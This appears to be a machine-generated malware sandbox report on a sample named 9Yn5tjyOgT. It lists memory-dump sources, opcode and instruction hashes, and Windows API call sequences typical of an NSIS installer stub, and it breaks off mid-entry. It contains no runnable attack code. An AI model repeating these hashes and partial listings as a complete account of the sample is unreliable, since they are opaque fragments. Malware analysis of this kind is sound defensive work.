                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 427f62222b3b9f523219702260df9ef23ea38bf79bc9f1be4c4c11ce638c87df
                                                                                                                    • Instruction ID: 908ea17d9c599aa149397664adc4d6e985331d62be3ecf2ef3b31bed3a35fa57
                                                                                                                    • Opcode Fuzzy Hash: 427f62222b3b9f523219702260df9ef23ea38bf79bc9f1be4c4c11ce638c87df
                                                                                                                    • Instruction Fuzzy Hash: C4C012B5005E0A8BF2042B50AC0CB39B6A8B707313FC82910A018428308BB854548684
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405528588.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_150000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 89d49f015d67d16106f29004509b6a00eb4a7083948a7488aa7e851866c40401
                                                                                                                    • Instruction ID: 178e2e603b0be4744b15dbdbdfbd3a35b3cd39f6f203f05784cc864099f4778b
                                                                                                                    • Opcode Fuzzy Hash: 89d49f015d67d16106f29004509b6a00eb4a7083948a7488aa7e851866c40401
                                                                                                                    • Instruction Fuzzy Hash: 5DC012300487098AD505F775EC56795377AA780300B408524E1092A66AEFB819865B90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 42aa2cee731e6211b6bbfdfea693603b1fca2dfa9402b10486ffc4ca431c82ca
                                                                                                                    • Instruction ID: dd98b169e45f21694620037a91697f44d48de72196bd092b1bdade348a7b6e87
                                                                                                                    • Opcode Fuzzy Hash: 42aa2cee731e6211b6bbfdfea693603b1fca2dfa9402b10486ffc4ca431c82ca
                                                                                                                    • Instruction Fuzzy Hash: 9DC04C3036C704CFE340AA6DE994A6537FCEF86B04F5158E5F5089B665CB66FC408645
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                                                    • GetVersion.KERNEL32 ref: 004034CE
                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                                    • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                                    • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                                    • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                                    • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                      • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                      • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                    • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                                    • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                                    • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                                    • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                                    • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                    • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                      • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                    • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                                    • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                                    • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                                    • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                                    • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                                    • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                                    • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                                    • CopyFileW.KERNEL32(00438800,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                                    • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                                    • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                    • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                    • API String ID: 3441113951-334447862
                                                                                                                    • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                                    • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                                    • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                                    • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                                    • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                                    • InvalidateRect.USER32(?,00000000,?), ref: 0040534D
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                                    • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                    • String ID: $M$N
                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                    • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                                    • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                                    • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                                    • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNEL32(?,?,00437800,76232EE0,00000000), ref: 00405B23
                                                                                                                    • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,76232EE0,00000000), ref: 00405B6B
                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,76232EE0,00000000), ref: 00405B8E
                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,76232EE0,00000000), ref: 00405B94
                                                                                                                    • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,76232EE0,00000000), ref: 00405BA4
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                    • String ID: 0WB$\*.*
                                                                                                                    • API String ID: 2035342205-351390296
                                                                                                                    • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                                    • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                                    • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                                    • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                    • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                                    • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                    • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76232EE0,00405B1A,?,00437800,76232EE0), ref: 00406736
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                    • String ID: xgB
                                                                                                                    • API String ID: 2295610775-399326502
                                                                                                                    • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                    • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                                    • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                    • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$EnableShow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1136574915-0
                                                                                                                    • Opcode ID: 1a02374288937e462cbfdf7f0b84f8963b1ccabab36c0863b4787aba27791d3b
                                                                                                                    • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                                    • Opcode Fuzzy Hash: 1a02374288937e462cbfdf7f0b84f8963b1ccabab36c0863b4787aba27791d3b
                                                                                                                    • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d74703e682d3968baaf163318c25e5a13f7afd55e516ad6ac94f288abdb85629
                                                                                                                    • Instruction ID: 6a7e24991584755992a9eb96408e9a17cf59e2d471492e581b5234cf87cc91de
                                                                                                                    • Opcode Fuzzy Hash: d74703e682d3968baaf163318c25e5a13f7afd55e516ad6ac94f288abdb85629
                                                                                                                    • Instruction Fuzzy Hash: 0162AA74E01268CFDB64DF65C884BDDBBB2BB89301F1081EAD909AB251DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3432402753.0000000036B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_36b80000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 81cca6a6f42452f6b34884b3d838f626e0c7f6f777cd8be5a35a08dcd15f708c
                                                                                                                    • Instruction ID: bbf6de922ee45895bb818f19925265b82b316cd391519555f02cc2e56a32875c
                                                                                                                    • Opcode Fuzzy Hash: 81cca6a6f42452f6b34884b3d838f626e0c7f6f777cd8be5a35a08dcd15f708c
                                                                                                                    • Instruction Fuzzy Hash: 40C1A074E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D809AB355DB355E86CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3432402753.0000000036B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_36b80000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d33542d472c07499f44c75cbd0cf2d8ffc2840f6a03b97b69dc86d1acba3142c
                                                                                                                    • Instruction ID: 62da7a5c0a55086f9938fad908188367f767503f4d5d5580117eb54e51a23207
                                                                                                                    • Opcode Fuzzy Hash: d33542d472c07499f44c75cbd0cf2d8ffc2840f6a03b97b69dc86d1acba3142c
                                                                                                                    • Instruction Fuzzy Hash: B5C1D074E01258CFEB14DFA5C994B9DBBB2BF89300F2080A9D819AB355DB359E85CF10
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3432402753.0000000036B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_36b80000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f532f84f361e26c4246aa7272f053ace08f0fe159f81bc0f6b3d578af2386518
                                                                                                                    • Instruction ID: 95cbe93cdc5b9005ff35e540e8b9a95457c2b21a6951345816d60c7dd6b0bd98
                                                                                                                    • Opcode Fuzzy Hash: f532f84f361e26c4246aa7272f053ace08f0fe159f81bc0f6b3d578af2386518
                                                                                                                    • Instruction Fuzzy Hash: 4DC1C174E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D409AB355DB345E86CF51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3432402753.0000000036B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_36b80000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3855cacab94f62f89ae7ef2037ec40099107d508f617e4090a2f4fbe3bec63e0
                                                                                                                    • Instruction ID: 90fccd40bc01049ba7b1aba67ba6e7f5837a9d47f7486c5ef2add5101b54f6e8
                                                                                                                    • Opcode Fuzzy Hash: 3855cacab94f62f89ae7ef2037ec40099107d508f617e4090a2f4fbe3bec63e0
                                                                                                                    • Instruction Fuzzy Hash: 7FC1C174E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D409AB355DB355E86CF11
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3432402753.0000000036B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_36b80000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1010d949d1934446cd6e12c47b8d830ce24b1f8e306efb28d781389800015340
                                                                                                                    • Instruction ID: 3bee574b642949c13d5a7abd3b712937db5d50a30b35a1fefaaa5d3d1b5e713f
                                                                                                                    • Opcode Fuzzy Hash: 1010d949d1934446cd6e12c47b8d830ce24b1f8e306efb28d781389800015340
                                                                                                                    • Instruction Fuzzy Hash: CAC1CF74E01258CFEB14DFA5C994B9DBBB2BF89300F2080A9D819AB355DB349E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3432402753.0000000036B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_36b80000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7b7f730abc826d8436f33161a39fe047167084abb444564fec3a80a6bb76962f
                                                                                                                    • Instruction ID: d5670ffc91935a1b387aeb4277ab614a7e3ae5c1cbf633d839def1a372f20ff9
                                                                                                                    • Opcode Fuzzy Hash: 7b7f730abc826d8436f33161a39fe047167084abb444564fec3a80a6bb76962f
                                                                                                                    • Instruction Fuzzy Hash: 2CC1B074E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3432402753.0000000036B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_36b80000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 48a205bc8d6e17eca9f5f2e3c8c2b42a8dc733b6d2927585940cb929386992b3
                                                                                                                    • Instruction ID: d399eb69e786756fadbf01761ab3f8f2a95abc80a0bed160e890b46fba1055f9
                                                                                                                    • Opcode Fuzzy Hash: 48a205bc8d6e17eca9f5f2e3c8c2b42a8dc733b6d2927585940cb929386992b3
                                                                                                                    • Instruction Fuzzy Hash: EDC1A074E01258CFEB14DFA5C994B9DBBB2BF89300F2081AAD409AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3432402753.0000000036B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_36b80000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 40002cfb88fae9217674478683fd3fc9fb0af28c1dad7181d69ec727142ece07
                                                                                                                    • Instruction ID: f5c4f4f242ab3d7c89e857770ad9c2b594b2eb486822bb3f3bbe168cc7da013d
                                                                                                                    • Opcode Fuzzy Hash: 40002cfb88fae9217674478683fd3fc9fb0af28c1dad7181d69ec727142ece07
                                                                                                                    • Instruction Fuzzy Hash: 20C1C074E00258CFEB14DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E86CF51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c992a68294573f410494c6161bda0a587a1fda6c402b4c0d732ad1cac30f177a
                                                                                                                    • Instruction ID: 5ed77633c12b90af5fe89845eaea00ca3a8275152bb9e1d77036792ce2595a0a
                                                                                                                    • Opcode Fuzzy Hash: c992a68294573f410494c6161bda0a587a1fda6c402b4c0d732ad1cac30f177a
                                                                                                                    • Instruction Fuzzy Hash: 94C1AF74E01258CFEB14DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 81735143db61ecf270544090e874db3e906615efc5577c5d3215f145034e79c7
